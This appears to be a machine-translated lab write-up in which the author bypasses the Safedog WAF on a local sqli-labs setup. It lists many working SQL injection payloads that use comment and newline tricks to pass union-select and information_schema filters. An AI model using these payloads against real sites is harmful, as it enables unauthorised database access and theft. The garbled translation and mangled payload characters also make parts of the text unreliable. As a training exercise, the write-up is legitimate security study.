Tips ： For learning purposes only , Don't do anything illegal . If by any illegal act , Will be severely punished in accordance with laws and regulations ！！！

Preface

After the last article sql After basic study , The following will officially enter the learning and training of the shooting range . In this article, we will discuss WAF Bypass experiment . But after the following attempts, I found that my strength was not enough ！ therefore , I plan to finish this again , I will study for a period of time and then repeat ！！！

One 、 Install the safety dog

Experimental environment ：Windows 10 + phpstudy（apache 2.4.39）+ Safe dog apache v4.0 edition

First , open phpstudy Click on the run , Convenient security dog can automatically detect the installed plug-in path , Click the installation program of the safety dog , Installation ：

Then you will enter the following screen ：

Then run with administrator privileges cmd, Get into your phpstudy Under folder Extensions\Apache2.4.39\bin Directory , Then type the following command ：

httpd.exe -k install -n apache2.4.39

At this point, you can write apache 2.4.39 Then click OK to install successfully .

Two 、 Bypass the experiment

Determine the injection point

First , take phpstudy Run up , And then we go into sqllibs The first level of , Enter the test statement to see ：
Good success ！ Then let's test ！！！

From the previous attempts, we found that the direct use and 1=1 It's not very good , Here may be filtered and identified and Filter it . So let's experiment one by one , Take a look at how the safety dog identifies and intercepts . I will be here and 1=1 To break up ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' and --+
http://192.168.10.129:8080/sqli/Less-1/?id=1' 1=1 --+

It is found that the above two pages will return sql Syntax error message , So it shows one thing , That is, the safety dog will not be filtered out alone and perhaps 1=1 . Here I thought , Feeling may be recognition and And view and Whether there is a space after + Characters in this form , So the experiment ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' and1--+
http://192.168.10.129:8080/sqli/Less-1/?id=1' and 1--+

experimental result , It is confirmed that and+ Space + The format of the string will be intercepted .

OK, so here we can start to try to bypass by using annotations and so on instead of spaces ！！

Enter here ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' and/**/1=1--+

I still can't find it , Then we use fuzz Test the Dharma ：
open burp, Intercept the package we intercept , Then click send to intrudermo modular , Select the following ：

then , Go to the pyload, Choose brute force ：

then , Click on attack, At this point, we can see that the violence test begins ！ Because the security dog has the defense of traffic attack , Therefore, it may be forbidden to enter the website later ,emmm In this case, either wait a while or restart directly apache Just the server . Well, here the test is finished , Let's try each length （ Because the skills here are not good , I don't know how to directly judge which can succeed … It's because I'm too busy ）. Then it is found that the test under one length is successful ：

then , We construct it as follows pyload：

http://192.168.10.129:8080/sqli/Less-1/?id=1’ and/*/!**/1–+

Found that you can bypass ！！

Here we can judge that there is an injection point ！

You can also use inline annotations here /!000001/ , payload:
http://192.168.10.129:8080/sqli/Less-1/?id=1’and/!000001/=/!000001/–+

Determine the number of columns

Here we can use the previous idea , utilize /*/!**/ This one acts as a space , And see if it works ？
well , Soon we solved this part . The next step is union The union injected ！

union Joint injection

First , We tried to use ordinary ones directly, which is not very good , Then let's test , The filtering rules of the safety dog for joint injection ：

http://192.168.10.129:8080/sqli/Less-1/?id=1'  unionselect --+

Be intercepted ！ Then input ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' union --+

sql Sentence explosion error , Explain a single union It's not intercepted , Similarly, I tried select It's the same ：

Then we already know , Safety dog waf The interception of joint injection rules is to recognize unionselect These two strings are intercepted together ！

Then follow the previous idea , See if you can use annotations to bypass this rule ？
Same method , utilize burp Grab the bag , Conduct fuzz Brute force cracking ：
Here's a test ,emm Not really , Then let's strengthen fuzz Parameters of the median ：

Finally, I found that there are many characters that can be bypassed ：
Choose any one to have a look ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' union/*/!*!**/select 1,2,3 --+

succeed ！！！ Move on to the next step ！

besides , Provide another idea , In the basic chapter, we talked about , You can use –+%0a This format continues by wrapping , Here we try to see ：

http://192.168.10.129:8080/sqli/Less-1/?id=1' union/*!--+/*%0aselect 1,2,3*/ --+

Naku

well , Let's enter database（） have a look ：

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*//--**/select 1,database(),3 --+

good heavens , Here is the database It's filtered …

Then let's try the specific filtering ： Get rid of database() Of （） after , We input and found that it exploded here sql Error of , Then it should be database() To test , Then let's continue to use the annotation or inline annotation to see ：

Continue to adopt burp Of fuzz： Add upper variable
Then set the ：
Seems to have found , Let's try ：

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*/!*!**/select 1,database/*/!//*/(),3 --+

succeed ！
Of course, you can also use inline annotations here , I'm not going to do it here , If you are interested, please see the link of my reference blog ！

Take the watch

First, try the functions one by one , First type group_concat(table_name):

No problem , Then go down ： Input from

Well, it has been intercepted here .... Let's try the annotation ：

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*/!*!**/select 1,group_concat(table_name),3  from/*/!*!**/1 --+

Okay , Here we've put from Around （ If not direct from 1 Will be blocked ） , Then here we go to the next step , Because also put informa This is also filtered ！

Here by referring to others' blogs , I learned that there is a method, namely ： The use method of inline annotation is to add an explanatory character in the middle and then line feed , That is to say /!%23%0a/ This form ！ Then in addition, you need to add /* To construct the /**/ As follows payload：

?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from/*!-- /*%0ainformation_schema.tables*/ where table_schema='security'--+

succeed ！！

Then since you can get the watch , So because of the column and data sql The sentence is similar , So we just need to go up payload Just modify it ！！

summary

Although I've generally walked once, the safety dog's waf Bypass , But I feel there are still many deficiencies , For bypass WAF The principle of may not be understood , Therefore, we need to continue to refuel ！！

reference

The safety dog bypasses the literature